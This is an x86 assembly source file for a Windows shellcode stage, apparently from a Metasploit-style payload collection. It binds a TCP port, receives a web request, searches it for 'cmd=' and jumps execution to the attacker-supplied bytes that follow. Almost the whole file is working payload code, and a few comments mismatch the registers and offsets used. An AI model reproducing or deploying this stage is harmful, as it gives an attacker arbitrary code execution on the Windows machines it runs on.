;-----------------------------------------------------------------------------;
; Author: Ty Miller @ Threat Intelligence
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (2nd December 2011)
;-----------------------------------------------------------------------------;
[BITS 32]

;INPUT: EBP is block_api.

%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
			 ; Input: EBP must be the address of 'api_call'.
			 ; Output: EDI will be the newly connected clients socket
			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)

%include "src/block_virtualalloc.asm"
			 ; Input: None
			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
			 ; Clobbers: EAX, EBX, ECX, EDX

  mov esi, eax		 ; save pointer to buffer since eax gets clobbered

recv:                    ; Receive the web request containing the stage
  push byte 0		 ; flags
  push ebx		 ; allocated space for stage
  push eax		 ; start of our allocated command space
  push edi		 ; external socket
  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
  call ebp               ; recv( external_socket, buffer, size, 0 );


close_handle:
  push edi		 ; hObject: external socket
  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
  call ebp		 ; CloseHandle

find_cmd:		 ; Search for "cmd=" in the web request for our payload
  cmp dword [esi], 0x3d646d63   ; check if ebx points to "cmd="
  jz cmd_found           ; if we found "cmd=" then parse the command
  inc esi                ; point ebx to next char in request data
  jmp short find_cmd     ; check next location for "cmd="
cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
;  add esi,4              ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command ... this compiles to 6 byte opcode
  db 0x83, 0xC6, 0x04	 ; add esi,4 ... but only 3 byte opcode

  jmp esi		 ; jump to our stage payload


